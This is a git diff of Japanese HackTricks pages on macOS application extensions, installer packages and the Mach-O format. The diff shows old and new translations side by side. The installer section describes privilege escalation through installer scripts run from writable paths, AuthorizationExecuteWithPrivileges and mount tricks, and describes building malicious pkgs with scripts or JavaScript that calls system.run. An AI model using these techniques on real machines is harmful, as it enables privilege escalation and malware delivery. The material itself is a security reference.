@ -27,7 +27,7 @@ HackTricksをサポートする他の方法:
./swda getUTIs #Get all the UTIs
./swda getHandler --URL ftp #Get ftp handler
```
アプリケーションがサポートする拡張機能を確認するには、以下の操作を行います:
あるアプリケーションがサポートする拡張子を確認することもできます。
```
cd /Applications/Safari.app/Contents
grep -A3 CFBundleTypeExtensions Info.plist | grep string
@ -61,14 +61,14 @@ grep -A3 CFBundleTypeExtensions Info.plist | grep string
```
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを発見する
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**する
* **ハッキングトリックを共有するには、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) githubリポジトリに提出してください
</details>

86
macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
View file

@ -1,36 +1,34 @@
# macOSインストーラーの悪用
# macOS インストーラーの悪用
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**
- **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
- [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手してください
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけてください
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 で **@carlospolopm** をフォローしてください [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリに PR を提出して、あなたのハッキングテクニックを共有してください
</details>
## Pkg基本情報
## Pkg基本情報
macOSの**インストーラーパッケージ**`.pkg`ファイルとしても知られていますは、macOSが**ソフトウェアを配布する**ために使用するファイル形式です。これらのファイルは、ソフトウェアが正しくインストールされ、実行されるために必要なすべてを含む**箱のようなもの**です。
macOS**インストーラーパッケージ**(または `.pkg` ファイルとしても知られるは、macOS が **ソフトウェアを配布** するために使用するファイル形式です。これらのファイルは、**ソフトウェアがインストールおよび正常に実行されるために必要なすべてを含む箱のようなもの** です。
パッケージファイル自体は、ターゲットコンピューターにインストールされる**ファイルとディレクトリの階層**を保持するアーカイブです。また、設定ファイルのセットアップやソフトウェアの古いバージョンのクリーンアップなど、インストールの前後に実行する**スクリプト**も含むことができます。
パッケージファイル自体は、**ターゲットコンピューターにインストールされるファイルとディレクトリの階層** を保持するアーカイブです。また、**設定ファイルのセットアップやソフトウェアの古いバージョンのクリーンアップなど、インストール前後にタスクを実行するスクリプト** も含めることができます。
### 階層
<figure><img src="../../../.gitbook/assets/Pasted Graphic.png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/Pasted Graphic.png" alt="https://www.youtube.com/watch?v=iASSG0_zobQ"><figcaption></figcaption></figure>
* **Distribution (xml)**: カスタマイズ(タイトル、ウェルカムテキストなど)およびスクリプト/インストールチェック
* **PackageInfo (xml)**: 情報、インストール要件、インストール場所、実行するスクリプトへのパス
* **Bill of materials (bom)**: ファイルの権限を持つインストール、更新、または削除するファイルのリスト
* **Payload (CPIOアーカイブgzip圧縮)**: PackageInfoの`install-location`にインストールするファイル
* **Scripts (CPIOアーカイブgzip圧縮)**: 実行のために一時ディレクトリに抽出されるインストール前後のスクリプトおよびその他のリソース。
### 展開
- **Distribution (xml)**: カスタマイズ(タイトル、ウェルカムテキストなど)およびスクリプト/インストールチェック
- **PackageInfo (xml)**: 情報、インストール要件、インストール場所、実行するスクリプトへのパス
- **Bill of materials (bom)**: ファイルのリスト、ファイルの権限とともにインストール、更新、削除する
- **Payload (CPIOアーカイブgzip圧縮)**: PackageInfo から `install-location` にインストールするファイル
- **Scripts (CPIOアーカイブgzip圧縮)**: インストール前後のスクリプトや実行用の一時ディレクトリに展開されるその他のリソース
```bash
# Tool to directly get the files inside a package
pkgutil —expand "/path/to/package.pkg" "/path/to/out/dir"
@ -44,71 +42,55 @@ xar -xf "/path/to/package.pkg"
cat Scripts | gzip -dc | cpio -i
cpio -i < Scripts
```
## DMG 基本情報
## DMG基本情報
DMGファイル、またはApple Disk Imagesは、AppleのmacOSでディスクイメージに使用されるファイル形式です。DMGファイルは基本的に**マウント可能なディスクイメージ**独自のファイルシステムを含むであり、通常は圧縮され、時には暗号化された生のブロックデータを含んでいます。DMGファイルを開くと、macOSはそれを物理ディスクであるかのように**マウントし**、その内容にアクセスできるようになります。
DMGファイル、またはApple Disk Imagesは、AppleのmacOSで使用されるディスクイメージのファイル形式です。DMGファイルは基本的に**マウント可能なディスクイメージ**独自のファイルシステムを含むであり、通常は圧縮され、時には暗号化された生のブロックデータを含んでいます。DMGファイルを開くと、macOSはそれを物理ディスクのように**マウント**し、その内容にアクセスできるようにします。
### 階層
<figure><img src="../../../.gitbook/assets/image (12) (2).png" alt=""><figcaption></figcaption></figure>
DMGファイルの階層は内容によって異なることがあります。しかし、アプリケーションのDMGの場合、通常はこの構造に従います
DMGファイルの階層は内容によって異なることがあります。ただし、アプリケーションのDMGの場合、通常はこの構造に従います
* トップレベル:これはディスクイメージのルートです。しばしばアプリケーションと、アプリケーションフォルダへのリンクが含まれています。
* アプリケーション (.app):これは実際のアプリケーションです。macOSでは、アプリケーションは通常、アプリケーションを構成する多くの個々のファイルフォルダを含むパッケージです。
* アプリケーションリンクこれはmacOSのアプリケーションフォルダへのショートカットです。これの目的は、アプリケーションのインストールを簡単にすることです。.appファイルをこのショートカットにドラッグすることでアプリをインストールできます。
- トップレベルこれはディスクイメージのルートです。通常、アプリケーションとmacOSのApplicationsフォルダへのリンクが含まれています。
- アプリケーション(.appこれが実際のアプリケーションです。macOSでは、アプリケーションは通常、アプリケーションを構成する多くの個々のファイルフォルダを含むパッケージです。
- ApplicationsリンクこれはmacOSのApplicationsフォルダへのショートカットです。これは、アプリケーションをインストールしやすくするためのものです。.appファイルをこのショートカットにドラッグしてアプリをインストールできます。
## pkg abuseによるPrivesc
## pkgの悪用による特権昇格
### 公開ディレクトリからの実行
えば、事前または事後のインストールスクリプトが**`/var/tmp/Installerutil`**から実行されている場合、攻撃者はそのスクリプトを制御して、実行されるたびに権限をエスカレーションすることができます。または、以下のような類似の例があります
たとえば、事前または事後のインストールスクリプトが**`/var/tmp/Installerutil`**から実行されている場合、攻撃者はそのスクリプトを制御できるため、実行されるたびに特権を昇格させることができます。また、別の類似の例
<figure><img src="../../../.gitbook/assets/Pasted Graphic 5.png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/Pasted Graphic 5.png" alt="https://www.youtube.com/watch?v=iASSG0_zobQ"><figcaption></figcaption></figure>
### AuthorizationExecuteWithPrivileges
これは、いくつかのインストーラーやアップデーターが**rootとして何かを実行する**ために呼び出す[public function](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg)です。この関数は**実行する**ファイルの**パス**をパラメータとして受け入れますが、攻撃者がこのファイルを**変更**できれば、rootでの実行を**悪用**して**権限をエスカレーション**することができます。
これは、いくつかのインストーラやアップデータが**rootとして何かを実行**するために呼び出す[公開関数](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg)です。この関数は**実行するファイルのパス**をパラメータとして受け入れますが、攻撃者がこのファイルを**変更**できれば、特権を昇格させるためにその実行を**悪用**することができます。
```bash
# Breakpoint in the function to check wich file is loaded
(lldb) b AuthorizationExecuteWithPrivileges
# You could also check FS events to find this missconfig
```
詳細については、このトークをチェックしてください: [https://www.youtube.com/watch?v=lTOItyjTTkw](https://www.youtube.com/watch?v=lTOItyjTTkw)
### マウントによる実行
インストーラーが `/tmp/fixedname/bla/bla` に書き込む場合、`/tmp/fixedname` 上に所有者なしで**マウントを作成**し、インストール中に任意のファイルを**変更して**インストールプロセスを悪用することが可能です。
インストーラが`/tmp/fixedname/bla/bla`に書き込む場合、`/tmp/fixedname`に所有者がいないマウントを作成することが可能です。これにより、インストール中に**任意のファイルを変更**してインストールプロセスを悪用することができます。
これの一例は **CVE-2021-26089** で、定期的なスクリプトを**上書きして** root として実行を得ることに成功しました。詳細については、トークをご覧ください: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE)
これの例として、**CVE-2021-26089**があり、**定期スクリプトを上書き**してルートとして実行することに成功しました。詳細については、以下のトークをご覧ください: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE)
## pkg をマルウェアとして使用
## マルウェアとしてのpkg
### 空のペイロード
ペイロードなしで、**事前および事後のインストールスクリプト**を含む **`.pkg`** ファイルを生成することが可能です。
単に**`.pkg`**ファイルを生成し、ペイロードなしで**事前および事後インストールスクリプト**を含めることが可能です。
### Distribution xml 内の JS
### Distribution xml内のJS
パッケージの **distribution xml** ファイルに **`<script>`** タグを追加することができ、そのコードは実行され、**`system.run`** を使用して**コマンドを実行**することができます:
パッケージの**distribution xml**ファイルに**`<script>`****`system.run`**使****:
<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
## 参考文献
* [**DEF CON 27 - Unpacking Pkgs A Look Inside Macos Installer Packages And Common Security Flaws**](https://www.youtube.com/watch?v=iASSG0\_zobQ)
* [**DEF CON 27 - Unpacking Pkgs A Look Inside Macos Installer Packages And Common Security Flaws**](https://www.youtube.com/watch?v=iASSG0_zobQ)
* [**OBTS v4.0: "The Wild World of macOS Installers" - Tony Lambert**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) で AWS ハッキングをゼロからヒーローまで学ぶ</strong></summary>
HackTricks をサポートする他の方法:
* **HackTricks にあなたの会社を広告したい**、または **HackTricks を PDF でダウンロードしたい** 場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式の PEASS & HackTricks グッズ**](https://peass.creator-spring.com) を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、私たちの独占的な [**NFT**](https://opensea.io/collection/the-peass-family) コレクションをチェックする
* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f) または [**telegram グループ**](https://t.me/peass) に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks) および [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の github リポジトリに PR を提出して、あなたのハッキングのコツを**共有する**。
</details>

175
macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
View file

@ -1,63 +1,63 @@
# macOS ユニバーサルバイナリ & Mach-O フォーマット
# macOSのUniversalバイナリとMach-Oフォーマット
<details>
<summary><strong>AWS ハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または **HackTricksをPDFでダウンロードしたい** 場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や [**テレグラムグループ**](https://t.me/peass)に**参加する**、または **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
- **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)。
- **ハッキングトリックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
## 基本情報
Mac OSのバイナリは通常、**ユニバーサルバイナリ**としてコンパイルされます。**ユニバーサルバイナリ**は、同じファイルで**複数のアーキテクチャをサポート**できます。
Mac OSのバイナリは通常、**universal binaries**としてコンパイルされます。**Universal binary**は**同じファイル内で複数のアーキテクチャをサポート**できます。
これらのバイナリは、基本的に以下の構成要素からなる**Mach-O構造**に従います:
これらのバイナリは、基本的に以下のような**Mach-O構造**に従います:
* ヘッダー
* ロードコマンド
* データ
- ヘッダー
- ロードコマンド
- データ
![](<../../../.gitbook/assets/image (559).png>)
![https://alexdremov.me/content/images/2022/10/6XLCD.gif](<../../../.gitbook/assets/image (559).png>)
## Fat ヘッダー
## Fatヘッダー
ファイルを検索するには`mdfind fat.h | grep -i mach-o | grep -E "fat.h$"`
次のコマンドでファイルを検索します:`mdfind fat.h | grep -i mach-o | grep -E "fat.h$"`
<pre class="language-c"><code class="lang-c"><strong>#define FAT_MAGIC 0xcafebabe
</strong><strong>#define FAT_CIGAM 0xbebafeca /* NXSwapLong(FAT_MAGIC) */
</strong>
struct fat_header {
<strong> uint32_t magic; /* FAT_MAGIC または FAT_MAGIC_64 */
</strong><strong> uint32_t nfat_arch; /* 続く構造体の数 */
<strong> uint32_t magic; /* FAT_MAGIC or FAT_MAGIC_64 */
</strong><strong> uint32_t nfat_arch; /* 後続する構造体の数 */
</strong>};
struct fat_arch {
cpu_type_t cputype; /* CPUの指定子 (int) */
cpu_subtype_t cpusubtype; /* マシンの指定子 (int) */
cpu_type_t cputype; /* CPU指定子int */
cpu_subtype_t cpusubtype; /* マシン指定子int */
uint32_t offset; /* このオブジェクトファイルへのファイルオフセット */
uint32_t size; /* このオブジェクトファイルのサイズ */
uint32_t align; /* 2のべき乗としてのアライメント */
uint32_t align; /* 2の乗としてのアライメント */
};
</code></pre>
ヘッダーには**マジックバイト**が続き、ファイルが**含むアーキテクチャの数**(`nfat_arch`)があり、各アーキテクチャには`fat_arch`構造体があります。
ヘッダーには**マジック**バイトが続き、ファイルが含む**アーキテクチャの数**`nfat_arch`)と各アーキテクチャが`fat_arch`構造体を持ちます。
以下で確認できます:
次のコマンドで確認します:
<pre class="language-shell-session"><code class="lang-shell-session">% file /bin/ls
/bin/ls: Mach-O ユニバーサルバイナリで、2つのアーキテクチャがあります: [x86_64:Mach-O 64ビット実行可能ファイル x86_64] [arm64e:Mach-O 64ビット実行可能ファイル arm64e]
/bin/ls (for architecture x86_64): Mach-O 64ビット実行可能ファイル x86_64
/bin/ls (for architecture arm64e): Mach-O 64ビット実行可能ファイル arm64e
/bin/ls: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit executable x86_64] [arm64e:Mach-O 64-bit executable arm64e]
/bin/ls (for architecture x86_64): Mach-O 64-bit executable x86_64
/bin/ls (for architecture arm64e): Mach-O 64-bit executable arm64e
% otool -f -v /bin/ls
Fat ヘッダー
Fat headers
fat_magic FAT_MAGIC
<strong>nfat_arch 2
</strong><strong>architecture x86_64
@ -76,15 +76,15 @@ capabilities PTR_AUTH_VERSION USERSPACE 0
</strong> align 2^14 (16384)
</code></pre>
または [Mach-O View](https://sourceforge.net/projects/machoview/) ツールを使用して
または[Mach-O View](https://sourceforge.net/projects/machoview/)ツールを使用する
<figure><img src="../../../.gitbook/assets/image (5) (1) (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
お考えの通り、通常、2つのアーキテクチャ用にコンパイルされたユニバーサルバイナリは、1つのアーキテクチャ用にコンパイルされたものの**サイズが2倍**になります。
通常、2つのアーキテクチャ向けにコンパイルされたuniversal binaryは、1つのアーキテクチャ向けにコンパイルされたものの**サイズを倍に**します。
## **Mach-O ヘッダー**
## **Mach-Oヘッダー**
ヘッダーには、ファイルをMach-Oファイルとして識別するためのマジックバイトや、ターゲットアーキテクチャに関する情報など、ファイルに関する基本情報が含まれています。ここで見つけることができます:`mdfind loader.h | grep -i mach-o | grep -E "loader.h$"`
ヘッダーには、ファイルを識別するためのマジックバイトや対象アーキテクチャに関する情報など、ファイルに関する基本情報が含まれています。これは次の場所にあります:`mdfind loader.h | grep -i mach-o | grep -E "loader.h$"`
```c
#define MH_MAGIC 0xfeedface /* the mach magic number */
#define MH_CIGAM 0xcefaedfe /* NXSwapInt(MH_MAGIC) */
@ -114,8 +114,8 @@ uint32_t reserved; /* reserved */
**ファイルタイプ**:
* MH\_EXECUTE (0x2): 標準のMach-O実行ファイル
* MH\_DYLIB (0x6): Mach-O動的リンクライブラリ(例:.dylib
* MH\_BUNDLE (0x8): Mach-Oバンドル例:.bundle
* MH\_DYLIB (0x6): Mach-Oダイナミックリンクライブラリ(.dylib
* MH\_BUNDLE (0x8): Mach-Oバンドル.bundle
```bash
# Checking the mac header of a binary
otool -arch arm64e -hv /bin/ls
@ -123,37 +123,36 @@ Mach header
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
MH_MAGIC_64 ARM64 E USR00 EXECUTE 19 1728 NOUNDEFS DYLDLINK TWOLEVEL PIE
```
または、[Mach-O View](https://sourceforge.net/projects/machoview/)を使用してください
または、[Mach-O View](https://sourceforge.net/projects/machoview/)を使用します
<figure><img src="../../../.gitbook/assets/image (4) (1) (4).png" alt=""><figcaption></figcaption></figure>
## **Mach-O ロードコマンド**
これは**メモリ内のファイルのレイアウト**を指定します。**シンボルテーブルの位置**、実行開始時のメインスレッドコンテキスト、必要な**共有ライブラリ**が含まれています。
コマンドは基本的に動的ローダー**dyldにバイナリをメモリにロードする方法を指示します。**
**メモリ内のファイルのレイアウト**がここで指定され、**シンボルテーブルの位置**、実行開始時のメインスレッドのコンテキスト、および必要な**共有ライブラリ**の詳細が示されています。メモリにバイナリをロードする際の動的ローダー**(dyld)**への命令が提供されます。
ロードコマンドはすべて、前述の**`loader.h`**で定義されている**load\_command**構造体から始まります:
これには、**`loader.h`**で定義された**load\_command**構造が使用されます。
```objectivec
struct load_command {
uint32_t cmd; /* type of load command */
uint32_t cmdsize; /* total size of command in bytes */
};
```
システムが異なって扱う**約50種類のロードコマンド**があります。最も一般的なものには、`LC_SEGMENT_64`、`LC_LOAD_DYLINKER`、`LC_MAIN`、`LC_LOAD_DYLIB`、および`LC_CODE_SIGNATURE`があります。
システムが異なる**50種類のロードコマンド**を異なる方法で処理します。最も一般的なものは、`LC_SEGMENT_64`、`LC_LOAD_DYLINKER`、`LC_MAIN`、`LC_LOAD_DYLIB`、および`LC_CODE_SIGNATURE`す。
### **LC\_SEGMENT/LC\_SEGMENT\_64**
{% hint style="success" %}
基本的に、このタイプのロードコマンドは、バイナリが実行されたときに**データセクションに示されたオフセットに従って、\_\_TEXT**(実行可能コード)**および\_\_DATA**(プロセスのデータ)**セグメントをロードする方法を定義します**
基本的に、このタイプのロードコマンドは、バイナリが実行されるときに、**\_\_TEXT**(実行コード)および**\_\_DATA**(プロセス用データ)**セグメントをどのようにロードするか**を、データセクションで示されたオフセットに従って定義します
{% endhint %}
これらのコマンドは、実行されるプロセスの**仮想メモリ空間****マップされるセグメントを定義します**
これらのコマンドは、プロセスの**仮想メモリ空間にマップされるセグメント****定義**します。
**\_\_TEXT** セグメント(プログラムの実行可能コードを保持する)や **\_\_DATA** セグメント(プロセスが使用するデータを含む)など、**異なるタイプのセグメント**があります。これらの**セグメントはMach-Oファイルのデータセクションに位置しています**
**\_\_TEXT**セグメント(プログラムの実行コードを保持する)や**\_\_DATA**セグメント(プロセスで使用されるデータを含む)など、**さまざまな種類のセグメント**があります。これらの**セグメントは、Mach-Oファイルのデータセクションに配置**されています
**各セグメント**は、複数の**セクション**にさらに**分割**されることがあります。**ロードコマンド構造**には、それぞれのセグメント内の**これらのセクションに関する情報**が含まれています。
**各セグメント**は、さらに複数の**セクション**に**分割**できます。**ロードコマンド構造**には、それぞれのセグメント内の**これらのセクションに関する情報**が含まれています。
ヘッダーの最初には**セグメントヘッダー**があります:
ヘッダー内にはまず**セグメントヘッダー**があります:
<pre class="language-c"><code class="lang-c">struct segment_command_64 { /* 64ビットアーキテクチャ用 */
uint32_t cmd; /* LC_SEGMENT_64 */
@ -174,7 +173,7 @@ int32_t initprot; /* 初期VM保護 */
<figure><img src="../../../.gitbook/assets/image (2) (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
このヘッダーは、その後に表示される**セクションの数を定義します**
このヘッダーは、**その後に表示されるセクションヘッダーの数を定義**しています。
```c
struct section_64 { /* for 64-bit architectures */
char sectname[16]; /* name of this section */
@ -191,52 +190,54 @@ uint32_t reserved2; /* reserved (for count or sizeof) */
uint32_t reserved3; /* reserved */
};
```
**セクションヘッダー**の例
**セクションヘッダーの例**
<figure><img src="../../../.gitbook/assets/image (6) (2).png" alt=""><figcaption></figcaption></figure>
もし**セクションオフセット**0x37DC、この場合は`0x18000`で始まる**アーキテクチャの開始地点**の**オフセット**を**加える**と、`0x37DC + 0x18000 = 0x1B7DC`になります。
**セクションオフセット**0x37DCに**アーキテクチャの開始オフセット**(この場合は `0x18000`を**加**すると、`0x37DC + 0x18000 = 0x1B7DC` になります。
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
また、**コマンドライン**から**ヘッダー情報**を取得することも可能です:
**コマンドライン**からも**ヘッダー情報**を取得することが可能です:
```bash
otool -lv /bin/ls
```
このcmdによってロードされる一般的なセグメント:
```markdown
以下は、このコマンドによってロードされる一般的なセグメントです:
* **`__PAGEZERO`:** カーネルに**アドレスゼロ**を**マップ**するよう指示し、そこからは**読み取り、書き込み、実行ができない**ようにします。構造体内のmaxprotおよびminprot変数は、このページに**読み書き実行権限がない**ことを示すためにゼロに設定されています。
* この割り当ては、**NULLポインタ参照の脆弱性を軽減する**ために重要です。
* **`__TEXT`**: **実行可能な** **コード**を含み、**読み取り**と**実行**の権限があります(書き込み不可)。このセグメントの一般的なセクション:
* **`__PAGEZERO`:** カーネルに**アドレスゼロ**を**マップ**するよう指示し、**読み取り、書き込み、実行**ができないようにします。構造体内のmaxprotとminprot変数はゼロに設定され、このページには**読み取り書き込み実行権限がない**ことを示します。
* この割り当ては**NULLポインターのデリファレンス脆弱性を緩和**するために重要です。
* **`__TEXT`**: **読み取り**および**実行**権限(書き込みなし)を持つ**実行可能コード**を含みます。このセグメントの一般的なセクション:
* `__text`: コンパイルされたバイナリコード
* `__const`: 定数データ
* `__cstring`: 文字列定数
* `__stubs``__stubs_helper`: 動的ライブラリのロードプロセスに関与
* **`__DATA`**: **読み取り可能**かつ**書き込み可能**なデータを含みます(実行不可)。
* `__stubs`および`__stubs_helper`: ダイナミックライブラリの読み込みプロセス中に関与します
* **`__DATA`**: **読み取り書き込み可能**なデータを含みます(実行不可)。
* `__data`: 初期化されたグローバル変数
* `__bss`: 初期化されていない静的変数
* `__objc_*` (\_\_objc\_classlist, \_\_objc\_protolist, など): Objective-Cランタイムによって使用される情報
* **`__LINKEDIT`**: リンカー(dyld)によって使用される情報、例えば "シンボル、文字列、および再配置テーブルエントリ" を含みます。
* **`__OBJC`**: Objective-Cランタイムによって使用される情報を含みます。この情報は\_\_DATAセグメント内の\_\_objc\_\*セクションにも見られることがあります。
* `__objc_*`\_\_objc\_classlist、\_\_objc\_protolistなど: Objective-Cランタイムで使用される情報
* **`__LINKEDIT`**: リンカーdyldのための情報を含み、「シンボル、文字列、および再配置テーブルエントリ」などが含まれます。
* **`__OBJC`**: Objective-Cランタイムで使用される情報を含みます。ただし、この情報は\_\_DATAセグメント内のさまざまな\_\_objc\_\*セクションにも見つかる可能性があります。
### **`LC_MAIN`**
**entryoff属性**にエントリポイントを含みます。ロード時に、**dyld**はこの値をバイナリの(メモリ内の)**ベースに単純に加算**し、バイナリのコードの実行を開始するためにこの命令に**ジャンプ**します。
**entryoff属性**にエントリポイントを含みます。ロード時に、**dyld**は単純にこの値を(メモリ内の)**バイナリのベースに追加**し、その後この命令に**ジャンプ**してバイナリのコードの実行を開始します。
### **LC\_CODE\_SIGNATURE**
Mach-Oファイルの**コード署名**に関する情報を含みます。これには、**署名ブロブ**を**指し示す** **オフセット**のみが含まれています。これは通常、ファイルの最後にあります。
しかし、このセクションに関する情報は[**このブログ投稿**](https://davedelong.com/blog/2018/01/10/reading-your-own-entitlements/)とこの[**gists**](https://gist.github.com/carlospolop/ef26f8eb9fafd4bc22e69e1a32b81da4)で見つけることができます。
Macho-Oファイルの**コード署名に関する情報**を含みます。**署名ブロブ**を指す**オフセット**のみを含みます。通常、これはファイルの最後にあります。\
ただし、このセクションに関する情報は、[**このブログ投稿**](https://davedelong.com/blog/2018/01/10/reading-your-own-entitlements/)およびこの[gists](https://gist.github.com/carlospolop/ef26f8eb9fafd4bc22e69e1a32b81da4)で見つけることができます。
### **LC\_LOAD\_DYLINKER**
プロセスのアドレス空間に共有ライブラリをマップする動的リンカー実行可能ファイルへの**パス**を含みます。**値は常に`/usr/lib/dyld`に設定されています**。macOSでは、dylibのマッピングは**カーネルモードではなくユーザーモード**で行われることに注意が必要です。
プロセスのアドレス空間に共有ライブラリをマップする**動的リンカー実行ファイルへのパス**を含みます。**値は常に`/usr/lib/dyld`に設定**されます。macOSでは、dylibのマッピングは**カーネルモードではなくユーザーモード**で行われることに注意することが重要です。
### **`LC_LOAD_DYLIB`**
このロードコマンドは、**動的** **ライブラリ**の依存関係を記述し、ローダー(dyld)にそのライブラリを**ロードしてリンクする**よう**指示**します。Mach-Oバイナリが必要とするライブラリごとにLC\_LOAD\_DYLIBロードコマンドがあります。
